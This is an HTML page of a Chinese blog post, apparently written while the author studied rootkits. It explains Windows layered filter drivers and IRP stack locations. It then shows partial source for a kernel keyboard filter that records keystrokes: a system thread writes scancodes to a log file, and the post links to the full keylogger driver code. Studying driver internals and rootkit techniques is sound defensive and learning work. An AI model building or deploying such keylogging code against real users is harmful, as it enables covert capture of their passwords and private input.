<!doctype html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="filter,rootkits," />





  <link rel="alternate" href="/atom.xml" title="Night May Say" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="最近在看rootkits相关的资料，无意间又翻到了驱动过滤类的知识。分层驱动程序不仅可以截获数据，也可以在传递数据之前对其进行修改。">
<meta property="og:type" content="article">
<meta property="og:title" content="windows分层过滤驱动再理解">
<meta property="og:url" content="http://venidic.com/2015/10/20/windows分层过滤驱动再理解/index.html">
<meta property="og:site_name" content="Night May Say">
<meta property="og:description" content="最近在看rootkits相关的资料，无意间又翻到了驱动过滤类的知识。分层驱动程序不仅可以截获数据，也可以在传递数据之前对其进行修改。">
<meta property="og:image" content="http://img.blog.csdn.net/20151109142704323">
<meta property="og:image" content="http://img.blog.csdn.net/20151109142946672">
<meta property="og:image" content="http://img.blog.csdn.net/20151109141517796">
<meta property="og:image" content="http://img.blog.csdn.net/20151109141834074">
<meta property="og:updated_time" content="2015-11-15T06:56:22.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="windows分层过滤驱动再理解">
<meta name="twitter:description" content="最近在看rootkits相关的资料，无意间又翻到了驱动过滤类的知识。分层驱动程序不仅可以截获数据，也可以在传递数据之前对其进行修改。">
<meta name="twitter:image" content="http://img.blog.csdn.net/20151109142704323">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://venidic.com/2015/10/20/windows分层过滤驱动再理解/"/>





  <title> windows分层过滤驱动再理解 | Night May Say </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d4af486f771155e47d0064be892093c0";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Night May Say</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">呓语</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="st-search-show-outputs">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <form class="site-search-form">
  <input type="text" id="st-search-input" class="st-search-input st-default-search-input" />
</form>

<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
    (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
    e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install', 'yjNAKfs2i_CxMAF_sm43','2.0.0');
</script>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://venidic.com/2015/10/20/windows分层过滤驱动再理解/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="venidic">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://7xieyq.com1.z0.glb.clouddn.com/molang.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Night May Say">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                windows分层过滤驱动再理解
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2015-10-20T11:33:30+08:00">
                2015-10-20
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/系统安全/" itemprop="url" rel="index">
                    <span itemprop="name">系统安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2015/10/20/windows分层过滤驱动再理解/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2015/10/20/windows分层过滤驱动再理解/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最近在看rootkits相关的资料，无意间又翻到了驱动过滤类的知识。分层驱动程序不仅可以截获数据，也可以在传递数据之前对其进行修改。<br><a id="more"></a></p>
<p>#IRP和堆栈位置<br>学习windows下的驱动，IRP一定是重中之重，他其实就相当于windows应用层下的消息，传递着各个操作的命令。先来看看IRP的结构：<br><img src="http://img.blog.csdn.net/20151109142704323" alt="这里写图片描述"><br>结合上面的结构图，定义如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div></pre></td><td class="code"><pre><div class="line">typedef struct _IRP &#123;</div><div class="line"> </div><div class="line">    PMDL MdlAddress;//MDL地址，内存描述符表。用来建立一块虚拟地址空间与物理地址页面之间的映射</div><div class="line"></div><div class="line">/*下面是一个共用体，很重要，联合的IRP，里面的SystemBuffer是指向应用层传递来的数据，采用的是DO_BUFFER_IO缓冲区拷贝的方式通信，速度慢，一般在DeviceIoControl小数据使用*/</div><div class="line">    union &#123;</div><div class="line">        struct _IRP *MasterIrp;</div><div class="line">        LONG IrpCount;</div><div class="line">        PVOID SystemBuffer;</div><div class="line">    &#125; AssociatedIrp;</div><div class="line"></div><div class="line"> /*里面有两个结构，一个Status是IRP完成的状态，一个是Infotmation存放数据传输的个数*/</div><div class="line">    IO_STATUS_BLOCK IoStatus;</div><div class="line"></div><div class="line">    CHAR StackCount;//栈的个数，可以由设备对象中StackSize的值决定</div><div class="line"></div><div class="line">    CHAR CurrentLocation;//当前的设备栈位置，很重要，过滤器驱动需要判断是否大于0，否则直接蓝屏处理</div><div class="line"></div><div class="line">    PKEVENT UserEvent;//构建IRP时很重要，同步事件，后面会讲到。</div><div class="line"></div><div class="line"></div><div class="line">       &#125; Overlay;</div><div class="line"></div><div class="line">    PVOID UserBuffer;//用户缓冲区，第三种方式和应用程序共享数据。这种速度最快，但也是最不安全，内核程序直接读取用户的内存，必</div><div class="line"></div><div class="line">须保证在相同设备上下文中访问才不会出错。  </div><div class="line">    union &#123;</div><div class="line"></div><div class="line">        struct &#123;</div><div class="line"></div><div class="line">            struct &#123;</div><div class="line"></div><div class="line">                union &#123;</div><div class="line"></div><div class="line"></div><div class="line">                    struct _IO_STACK_LOCATION *CurrentStackLocation;//IO设备栈指针，他是一个设备栈数组</div><div class="line">            </div><div class="line">                &#125;;</div><div class="line">            &#125;;</div><div class="line"></div><div class="line">        &#125; Overlay;</div><div class="line"></div><div class="line"></div><div class="line">    &#125; Tail;</div><div class="line"></div><div class="line">&#125; IRP, *PIRP;</div></pre></td></tr></table></figure></p>
<p>我们可以详细看下IO_STACK_LOCATION结构（截取一部分）：<br><img src="http://img.blog.csdn.net/20151109142946672" alt="这里写图片描述"><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div></pre></td><td class="code"><pre><div class="line">typedef struct _IO_STACK_LOCATION &#123;</div><div class="line">    UCHAR MajorFunction;//IRP主功能码</div><div class="line">    UCHAR MinorFunction;//IRP次功能码，尤其是Pnp的IRP尤为重要</div><div class="line">    UCHAR Flags;</div><div class="line">    UCHAR Control;//DeviceControl的控制码</div><div class="line"></div><div class="line">   </div><div class="line">/*以下是一个联合体，非常重要，几乎所有的用户API的请求都在这里面体现出来，记录了所有的用户请求信息，例如读写的长度信息等。下面</div><div class="line"></div><div class="line">只保留了几个*/</div><div class="line">    union &#123;</div><div class="line"></div><div class="line"></div><div class="line">        struct &#123;</div><div class="line">            ULONG Length;</div><div class="line">            ULONG POINTER_ALIGNMENT Key;</div><div class="line">            LARGE_INTEGER ByteOffset;</div><div class="line">        &#125; Read;//NtReadFile（也即是ReadFile的实现的）</div><div class="line"></div><div class="line">        struct &#123;</div><div class="line">            ULONG Length;</div><div class="line">            ULONG POINTER_ALIGNMENT Key;</div><div class="line">            LARGE_INTEGER ByteOffset;</div><div class="line">        &#125; Write;//NtWriteFile</div><div class="line"></div><div class="line"></div><div class="line">        struct &#123;</div><div class="line">            ULONG OutputBufferLength;</div><div class="line">            ULONG POINTER_ALIGNMENT InputBufferLength;</div><div class="line">            ULONG POINTER_ALIGNMENT IoControlCode;</div><div class="line">            PVOID Type3InputBuffer;</div><div class="line">        &#125; DeviceIoControl;//NtDeviceIoControlFile</div><div class="line"></div><div class="line"></div><div class="line">        struct &#123;</div><div class="line">            PCM_RESOURCE_LIST AllocatedResources;</div><div class="line">            PCM_RESOURCE_LIST AllocatedResourcesTranslated;</div><div class="line">        &#125; StartDevice;//为什么保留这个，原因在于我自己是做硬件设备驱动的，而这个是启动设备的PnP能够获取到硬件的设备资源。如果</div><div class="line"></div><div class="line">是纯内核开发不需要关心。</div><div class="line"></div><div class="line"></div><div class="line">   </div><div class="line">        struct &#123;</div><div class="line">            PVOID Argument1;</div><div class="line">            PVOID Argument2;</div><div class="line">            PVOID Argument3;</div><div class="line">            PVOID Argument4;</div><div class="line">        &#125; Others;//这个的重要性在于，若没有列举的结构都可以用强类型转换这几个字段。很灵活</div><div class="line"></div><div class="line">    &#125; Parameters;</div><div class="line"></div><div class="line"></div><div class="line">    PDEVICE_OBJECT DeviceObject;//指向的设备对象，很重要，从设备对象中可以获得驱动对象，然后再得到相应的分发函数</div><div class="line"></div><div class="line"></div><div class="line">    PFILE_OBJECT FileObject;//文件对象，文件系统之类的信息安全内核编程很重要。</div><div class="line"> </div><div class="line">    PIO_COMPLETION_ROUTINE CompletionRoutine;</div><div class="line"></div><div class="line"> </div><div class="line">    PVOID Context;</div><div class="line"></div><div class="line">&#125; IO_STACK_LOCATION, *PIO_STACK_LOCATION;</div></pre></td></tr></table></figure></p>
<p>然后就是4中IRP的分发方式</p>
<ol>
<li>直接完成IRP，返回。</li>
<li>放入IRP队列中，调用StartIO完成IRP串行化。</li>
<li>传递IRP到下一层，由下一层（或者再下一层完成）并且不需要获得IRP完成的情况</li>
<li>传递IRP到下一层，同时需要得到获得下一层处理完IRP的信息</li>
</ol>
<p>4种IRP的完成方式：</p>
<ol>
<li>直接完成IRP：IoCompleteRequest()</li>
<li>放入IRP队列：IoMarkIrpPending()和IoStartPacket()</li>
<li>传递IRP到下一层：IoSkipCurrentIrpStackLocation()和IoCallDriver()</li>
<li>需要获取完成信息：IoCopyCurrentIrpStackLocationToNext()和IoCallDriver()</li>
</ol>
<p>根据上述，我们可以知道当有新的请求发出的时候，IRP被创建，在分配的IRP中为链中的每个驱动程序添加额外的空间，这个额外的空间就是上述结构中的IO_STACK_LOCATION<br>他在内存中的结构类似于：<br><img src="http://img.blog.csdn.net/20151109141517796" alt="这里写图片描述"><br>IRP的头部存储着当前IO_STACK_LOCATION的索引和当前数组的指针（索引没有0号成员），这样当消息向底层驱动传递的时候通过调用IoCallDriver（实际上就是递减当前堆栈位置索引，然后与0比较，然后将栈指针移动到前一个设备栈）<br>类似于这个过程：<br><img src="http://img.blog.csdn.net/20151109141834074" alt="这里写图片描述"><br>这样不仅可以将irp传递到底层驱动中去，也允许着更底层的驱动程序使用位于他之上驱动程序提供的任意参数（通过使用IoSkipCurrentIrpStackLocation()可以将指针回拨）。</p>
<p>#关于键盘过滤<br>之前自己写过一篇文章：<br><a href="http://venidic.com/2015/04/06/filter-%E9%94%AE%E7%9B%98%E8%BF%87%E6%BB%A4/">[filter]windows键盘过滤</a><br>里面只是将对应的按键消息通过dbgview显示出来，但是如果想要进一步将按键写入文件，就稍微显得麻烦些。因为IRP处理函数的IRQ级别为DISPATCH，他禁止了文件操作，所以如果想要记录下按键，则需要我们创建一个单独的线程来处理文件的写入。<br><del>[未完待续]下课要去抢饭啦</del><br>其他的大致思路和之前的文章一样，都是需要在底层键盘驱动上绑定我们自己的过滤驱动，然后设置IRP的完成回调函数，在IRP完成返回后获得键盘信息。<br>这个地方的过滤稍微复杂一点的就是需要讲键盘消息写入到一个文本文件而不是打印出来：<br>通过<strong>PsCreateSystemThread</strong>这个api来创建底层线程</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">NTSTATUS PsCreateSystemThread(</div><div class="line">  _Out_     PHANDLE            ThreadHandle,</div><div class="line">  _In_      ULONG              DesiredAccess,</div><div class="line">  _In_opt_  POBJECT_ATTRIBUTES ObjectAttributes,</div><div class="line">  _In_opt_  HANDLE             ProcessHandle,</div><div class="line">  _Out_opt_ PCLIENT_ID         ClientId,</div><div class="line">  _In_      PKSTART_ROUTINE    StartRoutine,</div><div class="line">  _In_opt_  PVOID              StartContext</div><div class="line">);</div></pre></td></tr></table></figure>
<p>这里我们将DesiredAccess设置为ACCESS_MASK，将ObjectAttributes设置为NULL，讲processhandle设置为(HANDLE)0  (<em>代表着driver-created thread</em>)，同理我们将ClientId也设置为NULL，将后面两个参数分别指向我们的键盘记录线程和设备扩展。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">NTSTATUS status	= PsCreateSystemThread(&amp;hThread,(ACCESS_MASK)0,NULL,(HANDLE)0,NULL,ThreadKeyLogger,</div><div class="line">						pKeyboardDeviceExtension);</div><div class="line"></div><div class="line">	if(!NT_SUCCESS(status))</div><div class="line">		return status;</div><div class="line"></div><div class="line">	DbgPrint(&quot;Key logger thread created...\n&quot;);</div></pre></td></tr></table></figure>
<p>键盘的记录线程中，因为线程运行在内核中，所以只能通过自己来对线程进行卸载，于是我们在设备扩展程序中增加一个键盘线程运行的标志位来对线程的运行状态进行标记。当驱动卸载的时候，可以通过对标志位的改变来对线程进行终止。<br>设备扩展：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">typedef struct _DEVICE_EXTENSION </div><div class="line">&#123;</div><div class="line">	PDEVICE_OBJECT pKeyboardDevice; //设备栈中的键盘设备</div><div class="line">	PETHREAD pThreadObj;			//键盘记录线程</div><div class="line">	bool bThreadTerminate;		    //线程运行状态</div><div class="line">	HANDLE hLogFile;				//记录敲击键盘的文件句柄</div><div class="line">	KEY_STATE kState;				//特殊按键状态</div><div class="line"></div><div class="line">	</div><div class="line">	//同步和取键盘消息</div><div class="line">	KSEMAPHORE semQueue;</div><div class="line">	KSPIN_LOCK lockQueue;</div><div class="line">	LIST_ENTRY QueueListHead;</div><div class="line">&#125;DEVICE_EXTENSION, *PDEVICE_EXTENSION;</div></pre></td></tr></table></figure>
<p>我们继续回到键盘线程中，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div></pre></td><td class="code"><pre><div class="line">VOID ThreadKeyLogger(IN PVOID pContext)</div><div class="line">&#123;</div><div class="line"></div><div class="line">	PDEVICE_EXTENSION pKeyboardDeviceExtension = (PDEVICE_EXTENSION)pContext;</div><div class="line">	PDEVICE_OBJECT pKeyboardDeviceOjbect = pKeyboardDeviceExtension-&gt;pKeyboardDevice;</div><div class="line"></div><div class="line">	PLIST_ENTRY pListEntry;</div><div class="line">	KEY_DATA* kData; //custom data structure used to hold scancodes in the linked list</div><div class="line">	</div><div class="line">	while(true)</div><div class="line">	&#123;</div><div class="line">		//通过信号量来标志数据是否到达队列</div><div class="line">		KeWaitForSingleObject(&amp;pKeyboardDeviceExtension-&gt;semQueue,Executive,KernelMode,FALSE,NULL);	</div><div class="line">	</div><div class="line">		pListEntry = ExInterlockedRemoveHeadList(&amp;pKeyboardDeviceExtension-&gt;QueueListHead,</div><div class="line">												&amp;pKeyboardDeviceExtension-&gt;lockQueue);</div><div class="line">		</div><div class="line">		//线程通过对标志位判断来终止自己</div><div class="line">		if(pKeyboardDeviceExtension-&gt;bThreadTerminate == true)</div><div class="line">		&#123;</div><div class="line">			PsTerminateSystemThread(STATUS_SUCCESS);</div><div class="line">		&#125;</div><div class="line">		</div><div class="line">		//通过CONTAINING_RECORD获得指向数据的指针</div><div class="line">		kData = CONTAINING_RECORD(pListEntry,KEY_DATA,ListEntry);</div><div class="line"></div><div class="line">		</div><div class="line">		char keys[3] = &#123;0&#125;;</div><div class="line">		//扫描码转换为按键码ConvertScanCodeToKeyCode(pKeyboardDeviceExtension,kData,keys);</div><div class="line"></div><div class="line">		</div><div class="line">		if(keys != 0)</div><div class="line">		&#123;</div><div class="line">			//判断写入文件是否存在</div><div class="line">			if(pKeyboardDeviceExtension-&gt;hLogFile != NULL) </div><div class="line">			&#123;	</div><div class="line">				IO_STATUS_BLOCK io_status;</div><div class="line">				DbgPrint(&quot;Writing scan code to file...\n&quot;);</div><div class="line">			    </div><div class="line">				NTSTATUS status = ZwWriteFile(pKeyboardDeviceExtension-&gt;hLogFile,NULL,NULL,NULL,</div><div class="line">					&amp;io_status,&amp;keys,strlen(keys),NULL,NULL);</div><div class="line"></div><div class="line">				if(status != STATUS_SUCCESS)</div><div class="line">						DbgPrint(&quot;Writing scan code to file...\n&quot;);</div><div class="line">				else</div><div class="line">					DbgPrint(&quot;Scan code &apos;%s&apos; successfully written to file.\n&quot;,keys);</div><div class="line">			&#125;</div><div class="line">		&#125;	</div><div class="line">	&#125;</div><div class="line">	return;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>为了保证线程的安全性，我们需要在驱动加载的时候设置一个自旋锁来保证不会出现死锁或者竞争引起的蓝屏，用信号量记录下工作队列中的项数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">//Initialize the lock for the linked list queue</div><div class="line">	KeInitializeSpinLock(&amp;pKeyboardDeviceExtension-&gt;lockQueue);</div><div class="line"></div><div class="line">	//Initialize the work queue semaphore</div><div class="line">	KeInitializeSemaphore(&amp;pKeyboardDeviceExtension-&gt;semQueue, 0 , MAXLONG);</div></pre></td></tr></table></figure>
<p>在读例程中，我们为保证安全和通知也可以这样写：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">ExInterlockedInsertTailList(&amp;pKeyboardDeviceExtension-&gt;QueueListHead,</div><div class="line">			&amp;kData-&gt;ListEntry,</div><div class="line">			&amp;pKeyboardDeviceExtension-&gt;lockQueue);</div><div class="line"></div><div class="line">			//Increment the semaphore by 1 - no WaitForXXX after this call</div><div class="line">			KeReleaseSemaphore(&amp;pKeyboardDeviceExtension-&gt;semQueue,0,1,FALSE);</div></pre></td></tr></table></figure>
<p>主要和之前的代码稍微i不同的就是以上这些了，具体的代码参见<br><a href="https://github.com/venidic/codes/tree/master/rootkits/klog" target="_blank" rel="external">键盘记录驱动</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/filter/" rel="tag"># filter</a>
          
            <a href="/tags/rootkits/" rel="tag"># rootkits</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2015/10/09/windows下dmp抓取方法总结/" rel="next" title="windows下dmp抓取方法总结">
                <i class="fa fa-chevron-left"></i> windows下dmp抓取方法总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2015/11/01/EssentialPIM逆向分析及二次开发/" rel="prev" title="EssentialPIM逆向分析及二次开发">
                EssentialPIM逆向分析及二次开发 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

          
          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2015/10/20/windows分层过滤驱动再理解/"
           data-title="windows分层过滤驱动再理解" data-url="http://venidic.com/2015/10/20/windows分层过滤驱动再理解/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      

      <section class="site-overview sidebar-panel sidebar-panel-active">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://7xieyq.com1.z0.glb.clouddn.com/molang.jpg"
               alt="venidic" />
          <p class="site-author-name" itemprop="name">venidic</p>
           
              <p class="site-description motion-element" itemprop="description">veni vedi veci...</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">45</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">26</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/venidic" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/hiraethshaw" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/venidic" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.zhihu.com/people/venidic" target="_blank" title="zhihu">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  zhihu
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=gPbl7unk6ePA8fGu4_-t" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-envelope"></i>
                  
                  Email
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2015 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">venidic</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
